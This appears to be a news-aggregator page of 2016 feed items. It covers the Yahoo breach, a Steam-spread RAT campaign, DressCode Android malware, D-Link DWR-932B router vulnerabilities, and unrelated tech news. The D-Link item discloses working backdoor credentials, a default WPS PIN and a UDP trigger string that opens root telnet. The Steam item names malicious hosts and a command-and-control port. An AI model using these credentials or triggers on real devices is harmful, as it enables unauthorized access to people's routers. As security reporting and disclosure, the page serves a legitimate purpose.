News & Updates

The massive data breach that Yahoo! confirmed to the world last week is claimed by the company to have been carried out by a “state-sponsored actor” in 2014, which exposed the accounts of at least 500 Million Yahoo users.

But, now it seems that Yahoo has downplayed a mega data breach and triying to hide it’s own security blunder.

Recently the information security firm InfoArmor that analyzed


Source: http://feeds.feedburner.com/TheHackersNews

Malware researcher discovered a Reddit user which is warning of the existence of hacked Steam accounts used to spread a Remote Access Trojan (RAT).

This week the popular malware researcher  from Bleepingcomputer.com has found a worrisome message on Reddit. The Reddit user with the moniker Haydaddict was warning of the existence of compromised Steam accounts spreading a Remote Access Trojan (RAT).

“Quinn Lobdell hacked on Steam. Please be aware if others try to send you sketchy links. Scrub Killa and Jessie affected as well.” reads the post.

The accounts were used to send chat messages containing links to videomeo.pw to watch a video.

Hacked Steam accounts

“When the target went to the page, they would be greeted with a message stating that they needed to update Flash Player in order to watch the video.” explained Lawrence Abrams in a blog post.

Hacked Steam accounts

The trick is quite simple and leverages on the user’s curiosity when it downloads and executes the Flash Player installer apparently nothing happens, but in reality the victim has opened its machine to the attacker.

The Flash Player installer executes a PowerShell script (zaga.ps1) that downloads a 7-zip archive, 7-zip extractor, and a CMD script from a remote server (http://zahr[.]pw).

The PowerShell then launches the CMD file, which extracts the sharchivedmngr to the %AppData%lappclimtfldr folder and configures Windows to automatically start an instance of the NetSupport Manager Remote Control Software, renamed as mcrtvclient.exe, when the victim logs in.

When the victims will log in the infected machine, the NetSupport Manager will connect to the NetSupport gateway at leyv.pw:11678 and await commands, at this point the attacker has complete control over the victim’s machine.

“For those who are concerned they are infected with this Steam Trojan, I suggest they check the %AppData% folder for the specified folders.” suggests Lawrence Abrams in order to check if the system is compromised.

Every time you visit a link be careful, and make sure to have installed up to date defense solutions.

medianet_width=’300′; medianet_height= ‘250’; medianet_crid=’762221962′;

Pierluigi Paganini

(Security Affairs – Hacked Steam accounts, malware)

The post Watch out, hacked Steam accounts used as an attack vector appeared first on Security Affairs.

Source: Security affairs

If you have a D-Link DWR-932 B LTE Wireless router you need to know that it is affected by more that 20 security issues, including backdoor accounts.

D-Link ‘s DWR-932B LTE router and access point has been found vulnerable to a number of backdoors as well as a default WPS (Wi-Fi Protected Setup) PIN.

Security researcher and blogger, Pierre Kim, has uncovered a number of security flaws in the device that even affect the latest version of its firmware.

Kim had previously released a number of flaws that existed in the LTE QDH routers made by Quanta and it appears that they also appear in D-Link models.

Among the various vulnerabilities the researcher discovered that two backdoor accounts which can be used to bypass HTTP authentication include the admin account with the username and password ‘admin’ as well as a root account using the password ‘1234’.

The D-Link DWR-932 B also contains a default WPS PIN of 28296607 which is hard coded in the /bin/appmgr directory. It’s also located in the HostAP and HTTP API’s configurations.

The /bin/appmgr program also allows malicious attackers to send a specific string via UDP which forces the device to start a telnet service which operates without authentication. This can occur even in the telnet service isn’t already running. If HELODBC is sent as a command to 0.0.0.0:39889 over UDP the router allows unauthenticated access using the root account.

Both /etc/inadyn-mt.conf and /bin/qmiweb contain various vulnerabilities, the conf file contains a username with hardcoded password and the http daemon in qmiweb has multiple possible routes for exploit.

d-link-dwr-932

Kim also discovered that the credentials for using the FOTA (Firmware Over The Air) service contained hard-coded user credentials in the /sbin/fotad binary, there is an added degree of security with the daemon attempting to download the firmware over HTTPS, however the SSL certificate for this service has been invalid for over 18 months.

It was also found that the security level of the UPNP program (miniupnp) in the router is lowered, thus allowing a LAN based attacker the ability to add Port forwarding from the Internet to other local clients

“There is no restriction about the UPnP permission rules in the configuration file, contrary to common usage in UPnP where it is advised to only allow redirection of port above 1024,” explained Kim.

This would allow attackers to forward traffic from the outside onto the local network, including services such as mail, file transfer, and database, posing a huge number of vehicles as Advanced Persistent Threats.

Kim informed D-Link of the issues in the D-Link DWR-932 devices back in June of this year but to date still hasn’t received any notification confirming that they have been resolved. Following 90 days of silence from D-Link, Kim has now chosen to publish an advisory revealing the bugs.

D-Link patched a number of flaws in August following the discovery of a weakness in a number of DIR model routers after a D-Link Wi-Fi camera was found to be affected by a vulnerability that later proved to be present in over 120 of their products.

Written by: Steven Boyd

Steven Boyd

Steven is a security consultant, researcher, ethical hacker and freelance writer with over 16 years of experience in the industry. He has provided security consultancy to some of the world’s biggest banks, the private sector as well as public services and defense. He is the owner and creator of security blog www.CybrViews.com.

Twitter: @CybrViews

 

 

medianet_width=’300′; medianet_height= ‘250’; medianet_crid=’762221962′;

Pierluigi Paganini

(Security Affairs – D-Link DWR-932, Hacking)

The post D-Link DWR-932 B LTE Wireless router affected by multiple backdoors appeared first on Security Affairs.

Source: Security affairs

Enlarge (credit: Curious Expeditions)

Google Play was recently found to be hosting more than 400 apps that turned infected phones into listening posts that could siphon sensitive data out of the protected networks they connected to, security researchers said Thursday.

One malicious app infected with the so-called DressCode malware had been downloaded from 100,000 to 500,000 times before it was removed from the Google-hosted marketplace, Trend Micro researchers said in a post. Known as Mod GTA 5 for Minecraft PE, it was disguised as a benign game, but included in the code was a component that established a persistent connection with an attacker controlled server. The server then had the ability to bypass so-called network address translation protections that shield individual devices inside a network. Trend Micro has found 3,000 such apps in all, 400 of which were available through Play.

“This malware allows threat actors to infiltrate a user’s network environment,” Thursday’s report stated. “If an infected device connects to an enterprise network, the attacker can either bypass the NAT device to attack the internal server or download sensitive data using the infected device as a springboard.”

Read 5 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

Amazon has unveiled yet another add-on for its paying Prime subscribers, and it represents the company’s biggest tie-in yet with Twitch, the game-streaming service that Amazon acquired in 2014 for nearly $1 billion.

The new add-on, Twitch Prime, will dole out monthly gaming-related goodies to any Amazon Prime subscriber who links their shopping account with a Twitch user ID. Upon doing so, Twitch users will get a few Twitch-specific bonuses. The first is a series of free game downloads, which change every month and can range from full-game unlocks to DLC add-ons for games you already own (much like PlayStation Plus and Xbox Live Gold). Twitch Prime’s first month includes a full download of the Twitch-enabled multiplayer game Streamline and add-on bonuses for free-to-play games Hearthstone and Smite.

Twitch Prime appears to be enabled for Prime subscribers in the US, UK, Spain, Germany, France, Canada, and Italy.

Read 5 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

Enlarge / The two stars of η Carinae are embedded in the nebula they’ve created. (credit: NASA, ESA, and the Hubble SM4 ERO Team)

“Even among Luminous Blue Variable [stars], η Car is unusual and its parameters are extreme.”

That bit of science-speak roughly translates to “Even among the largest, most energetic stars, Eta Carinae has done things we can’t explain, but find incredibly impressive.” The top item in η Carinae’s (η is the Greek letter eta) list of extreme behaviors involves producing a decades-long outburst that caused it to become the second-brightest star in the sky. This outburst released as much energy as a supernova and ejected many times the mass of the Sun. Yet somehow η Carinae remained intact.

Now, researchers have used a series of Hubble images to produce a timeline of the debris left behind by this enigmatic outburst. The new data reveals that this was just the latest in a series of eruptions, and we still can’t explain why they happen.

Read 14 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

It says “Mini” but every generation gets bigger and bigger. (credit: Jim Resnick)

BMW confirmed to Bloomberg today that it will start work on an electric Mini and an electric X3 SUV. This news comes after reports of deliberation on BMW’s electric strategy among the company’s top executives earlier this month.

Chief Executive Officer Harald Krueger told Bloomberg that the all-electric Mini would be market-ready by 2019 and the X3 SUV would be a 2020 vehicle.

Reuters reported three weeks ago that BMW’s top executives had been resistant to the idea of building an electric Mini-brand car. Minis have a smaller profit margin than BMW-brand cars, they argued, and the investment costs of building an all-electric vehicle are considerable. A few executives felt that BMW should push ahead in the electric vehicle field, but after the weak US performance of the i3, other bigwigs were apparently not convinced that committing additional investment to purely electric cars would make financial sense.

Read 5 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

Enlarge (credit: Nintendo)

Aside from a hands-off display at New York Comic-Con, we haven’t seen or heard much about the upcoming, mini-sized NES Classic Edition since its first announcement in July. Now, new information is coming from Nintendo itself and from journalists at a recent hands-on preview event. They bring both good and bad news for retro Nintendo fans.

On the good side, the NES Mini apparently does have a few graphical options to play with. A recently updated promotional page now highlights three different visual modes: “pixel perfect” (i.e. square pixels), 4:3 (i.e. cathode ray tube ratio), and “CRT filter” (i.e. simulated scan lines on your HDTV). Nintendo also notes that you can create four “Suspend Points” for each of the 30 games on the system. You can lock any of those points so they don’t accidentally get saved over.

Hands-on reports from journalists also confirm what we first surmised from an earlier NES Classic Edition trailer: that the emulated graphics and colors on the NES Classic Edition’s 30 built-in games are much more faithful to the original games than Nintendo’s previous Virtual Console releases. Wired’s Chris Kohler notes that “the whites are sparkling white, and everything pops in bright color” on the new HDMI-powered system.

Read 5 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/